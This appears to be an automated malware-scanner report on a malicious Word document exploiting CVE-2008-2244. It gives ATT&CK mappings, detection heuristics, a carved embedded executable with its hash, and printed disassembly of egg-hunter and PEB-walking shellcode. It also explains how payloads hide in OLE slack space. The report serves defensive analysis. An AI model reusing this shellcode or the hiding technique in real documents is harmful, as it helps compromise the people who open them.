MALICIOUS
600
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1566.001 Spearphishing Attachment
The file is a malicious Microsoft Word document that exploits CVE-2008-2244 to drop and execute an embedded PE executable. The presence of shellcode indicators like Egg-hunter, PEB access, and API calls such as WinExec, CreateProcess, WriteProcessMemory, and CreateRemoteThread strongly suggest the execution of a secondary payload. The embedded executable is the primary IOC.
Heuristics 14
-
CVE-2008-2244 — Microsoft Word record-parsing payload critical CVE likely CVE_2008_2244Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREADReference to CreateRemoteThread API
-
Embedded PE executable critical OLE_EMBEDDED_EXEMZ/PE header found inside document — possible embedded executable
-
Egg-hunter shellcode pattern high SC_EGG_HUNTEREgg-hunter shellcode pattern
Disassembly
Attempted x86 opcode disassembly00001580 6681caff0f or dx, 0xfff 00001585 42 inc edx 00001586 66f7c2ff0f test dx, 0xfff 0000158B 7510 jne 0x159d 0000158D 52 push edx 0000158E 6a02 push 2 00001590 58 pop eax 00001591 cd2e int 0x2e 00001593 3c05 cmp al, 5 00001595 5a pop edx 00001596 74e8 je 0x1580 00001598 b841424142 mov eax, 0x42414241 0000159D 8bfa mov edi, edx 0000159F 8bda mov ebx, edx 000015A1 6681e3ff0f and bx, 0xfff 000015A6 6681fbfd0f cmp bx, 0xffd 000015AB 74d3 je 0x1580 000015AD af scasd eax, dword ptr es:[edi] 000015AE 75d5 jne 0x1585 000015B0 af scasd eax, dword ptr es:[edi] 000015B1 75d2 jne 0x1585 000015B3 ffe7 jmp edi 000015B5 cc int3 000015B6 cc int3 000015B7 cc int3 000015B8 cc int3 000015B9 cc int3 000015BA cc int3 000015BB cc int3 000015BC cc int3 000015BD cc int3 000015BE cc int3 000015BF cc int3 000015C0 cc int3 000015C1 3535353535 xor eax, 0x35353535 000015C6 3535353535 xor eax, 0x35353535 000015CB 3535353535 xor eax, 0x35353535 000015D0 3535357862 xor eax, 0x62783535 000015D5 1200 adc al, byte ptr [eax] 000015D7 23242526272829 and esp, dword ptr [0x29282726] 000015DE 3132 xor dword ptr [edx], esi
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly00004C3E 64a130000000 mov eax, dword ptr fs:[0x30] 00004C44 8b400c mov eax, dword ptr [eax + 0xc] 00004C47 8b701c mov esi, dword ptr [eax + 0x1c] 00004C4A ad lodsd eax, dword ptr [esi] 00004C4B 8b4008 mov eax, dword ptr [eax + 8] 00004C4E 8985d8feffff mov dword ptr [ebp - 0x128], eax 00004C54 8985d4feffff mov dword ptr [ebp - 0x12c], eax 00004C5A 5e pop esi 00004C5B e80f000000 call 0x4c6f 00004C60 47 inc edi 00004C61 657450 je 0x4cb4 00004C64 726f jb 0x4cd5 00004C66 634164 arpl word ptr [ecx + 0x64], ax 00004C69 647265 jb 0x4cd1 00004C6C 7373 jae 0x4ce1 00004C6E 005889 add byte ptr [eax - 0x77], bl 00004C71 8518 test dword ptr [eax], ebx 00004C73 fe .byte 0xfe 00004C74 ff .byte 0xff 00004C75 ff8985d0feff dec dword ptr [ecx - 0x12f7b] 00004C7B ffc7 inc edi 00004C7D 85cc test esp, ecx 00004C7F fe .byte 0xfe 00004C80 ff .byte 0xff 00004C81 ff0d000000c7 dec dword ptr [0xc7000000] 00004C87 85e0 test eax, esp 00004C89 fe .byte 0xfe 00004C8A ff .byte 0xff 00004C8B ff00 inc dword ptr [eax] 00004C8D 0000 add byte ptr [eax], al 00004C8F 00e8 add al, ch 00004C91 7a02 jp 0x4c95 00004C93 0000 add byte ptr [eax], al 00004C95 89858cfeffff mov dword ptr [ebp - 0x174], eax 00004C9B e8 .byte 0xe8 00004C9C 0d .byte 0x0d 00004C9D 00 .byte 0x00
-
Reference to WinExec API high SC_STR_WINEXECReference to WinExec API
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 75,059 bytes but its declared streams total only 16,486 bytes — 58,573 bytes (78%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
OLE file contains raw shellcode-like resolver payload high OLE_RAW_SHELLCODE_PAYLOADMalformed or legacy OLE file contains raw PEB/API-resolver shellcode bytes at the file level, including loader-walk instructions and a nearby payload marker. This indicates an exploit payload carrier but does not identify a specific parser CVE.
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
embedded_office_00005500.exe |
embedded-pe | Office MZ+PE at offset 0x5500 | 53299 bytes |
SHA-256: 8660bad9b4369e283e88ca7534c6badf27f403de96f6967f45f8bb44e8308d77 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.